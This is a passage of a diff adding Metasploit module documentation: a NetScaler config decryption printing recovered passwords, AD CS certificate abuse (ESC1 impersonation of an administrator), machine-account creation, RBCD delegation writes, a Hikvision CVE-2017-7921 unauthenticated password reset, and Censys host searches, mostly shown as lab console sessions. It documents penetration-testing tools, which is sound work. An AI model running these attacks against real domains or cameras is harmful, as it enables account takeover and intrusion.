+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 5c35e0aa5c3d999e9ff10de1fa32910f9ac28b1ee8824c2301ac964e1f5f987e-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13863
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c5990558d4bfae059f27191f4c91a2dfa826d7318db287e109f5da39f9 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35  -LRTM DISABLED -resptimeout 4 -destPort 1812 -devno 13864
+[+] User: ldap
+[+] Pass: Gr33n3gg$
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
+template's configuration the resulting certificate can be used for various operations such as authentication.
+PFX certificate files that are saved are encrypted with a blank password.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
+3. Set the `CA`, `RHOSTS`, `SMBUser` and `SMBPass` options
+4. Run the module and see that a new certificate was issued or submitted
+
+## Options
+
+### CA
+The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g. "User".
+
+### ALT_DNS
+Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
+
+### ALT_UPN
+Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
+format `$username@$dnsDomainName`.
+
+## Actions
+
+### REQUEST_CERT
+Request a certificate. The certificate PFX file will be stored on success. The certificate file's password is blank.
+
+## Scenarios
+
+### Obtaining Configuration Values
+For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
+by a normal user via LDAP.
+
+```
+msf6 > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
+BIND_DN => aliddle@msflab.local
+msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_ADCS_CAS 
+ACTION => ENUM_ADCS_CAS
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local
+=============================================================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cacertificatedn       CN=msflab-DC-CA, DC=msflab, DC=local
+ certificatetemplates  ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA |
+                       | Administrator
+ cn                    msflab-DC-CA
+ dnshostname           DC.msflab.local
+ name                  msflab-DC-CA
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
+
+### Issue A Generic Certificate
+In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
+by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different
+User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a
+different UPN effectively issues a certificate that can be used to authenticate as another user.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC1-Test`.
+* The UPN of a target account, in this case `smcintyre@msflab.local`.
+
+See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
+information.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
+CERT_TEMPLATE => ESC1-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
+ALT_UPN => smcintyre@msflab.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```
@@ -0,0 +1,116 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras contain improper authentication logic that allow unauthenticated impersonation of any
+configured user account. This allows an attacker to bypass all security on the camera and
+gain full admin access, allowing them to thereby completely control the camera and modify
+any setting or retrieve sensitive information.
+
+This module allows the attacker to perform an unauthenticated password change on
+any vulnerable Hikvision IP Camera by utilizing the improper authentication logic to
+send a request  to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `username` parameter and will instead use the username
+part of this string as the user to log in as. This can then be used to gain full 
+administrative access to the affected device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled
+camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set USERNAME <name of user>`
+1. `set PASSWORD <new password>`
+1. `check`
+1. `set ID <id of user whose password you want to reset from "check" output>`
+1. `run`
+1. You should get a message that the password for the user has been successfully changed.
+
+## Options
+### STORE_CRED
+This option allows you to store the user and password credentials in the Metasploit database for further use.
+
+## Scenarios
+
+### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
+
+```
+msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+RHOSTS => 192.168.100.180
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
+PASSWORD => Pa$$W0rd
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
+ID => 1
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
+STORE_CRED => true
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+
+Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   ID          1                yes       ID (default 1 for admin)
+   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
+                                          t
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credential into the database.
+   USERNAME    admin            yes       Username for password change
+   VHOST                        no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[*] Starting the password reset for admin...
+[+] Password reset for admin was successfully completed!
+[*] Please log in with your new password: Pa$$W0rd
+[*] Credentials for admin were added to the database...
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
+```
@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained
+Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in
+DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have
+write access to the target object (the object specified in DELEGATE_TO).
+
+## Verification Steps
+
+1. Set the `RHOST` value to a target domain controller
+2. Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
+3. Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
+4. Use the `WRITE` action to configure the target for RBCD
+
+## Actions
+
+### FLUSH
+Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just
+the matching ACEs.
+
+### READ
+Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD.
+
+### REMOVE
+Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs
+instead of deleting the entire security descriptor.
+
+### WRITE
+Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing
+ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists.
+
+## Options
+
+### DELEGATE_TO
+The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated
+user must have write access to this object.
+
+### DELEGATE_FROM
+The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE)
+the delegation target.
+
+## Scenarios
+
+### Window Server 2019 Domain Controller
+In the following example the user `MSFLAB\sandy` has write access to the computer account `WS01$`. The sandy account is
+used to add a new computer account to the domain, then configures WS01$ for delegation from the new computer account.
+
+The new computer account can then impersonate any user, including domain administrators, on `WS01$` by authenticating
+with the Service for User (S4U) Kerberos extension.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass                             no        The password for the specified username
+   SMBUser                             no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+SMBUser => sandy
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.10:445 - Successfully created MSFLAB\DESKTOP-QLSTR9NW$
+[+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
+[+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd 
+msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
+BIND_DN => sandy@msflab.local
+msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_TO WS01$
+DELEGATE_TO => WS01$
+msf6 auxiliary(admin/ldap/rbcd) > read
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
+DELEGATE_FROM => DESKTOP-QLSTR9NW$
+msf6 auxiliary(admin/ldap/rbcd) > write
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > read
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[*] Allowed accounts:
+[*]   DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/rbcd) > 
+```
@@ -1,212 +1,131 @@
 ## Vulnerable Application

-The module use the Censys REST API to access the same data accessible through web interface.
-The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+The module uses the Censys REST API to access the same data accessible through
+the web interface. The search endpoint allows queries using the Censys Search
+Language against the Hosts dataset. Setting the CERTIFICATES option will also
+retrieve the certificate details for each relevant service by querying the
+Certificates dataset.

 ## Verification Steps

 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
-4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK query`
-6: Do: `run`
+1. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+1. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
+1. Do: `set CERTIFICATES true` (to get certificates details - optional)
+1. Do: `set QUERY <query>`
+1. Do: `run`

 ## Scenarios

-### Certificates Search
+A single keyword or a domain name can be used. For advanced searches, the Censys Search Language can also be used.
+Here, the following query is used to get the hosts running FTP or Telnet in Germany:
+```
+location.country_code: DE and services.service_name: {"FTP", "Telnet"}
+```
+
+### Without certificates details

 ```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE certificates
-CENSYS_SEARCHTYPE => certificates
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted>
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[+] 2.23.14.218 - 21/FTP
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
+[+] 2.23.15.71 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.23.15.238 - 21/FTP,80/HTTP,443/HTTP
+[+] 2.56.11.154 - 21/FTP,22/SSH,25/SMTP,53/DNS,80/HTTP,110/POP3,143/IMAP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,2077/HTTP,2078/HTTP,2079/HTTP,2080/HTTP,2082/HTTP,2083/HTTP,2086/HTTP,2087/HTTP,2095/HTTP,2096/HTTP,3306/MYSQL
+[+] 2.56.11.222 - 21/FTP,22/SSH,80/HTTP,111/PORTMAP,137/NETBIOS,443/HTTP,445/SMB
+[+] 2.56.77.123 - 21/FTP,22/SSH,80/HTTP
+[+] 2.56.77.162 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,5022/SSH,8443/HTTP,50080/HTTP
+[+] 2.56.77.185 - 21/FTP,25/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN
+[+] 2.56.77.186 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN,5060/SIP
+[+] 2.56.77.189 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/HTTP,8080/HTTP,50080/HTTP
 ...
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.41 - CN=NeXpose Security Console, O=Rapid7
+```
+
+### With certificates details
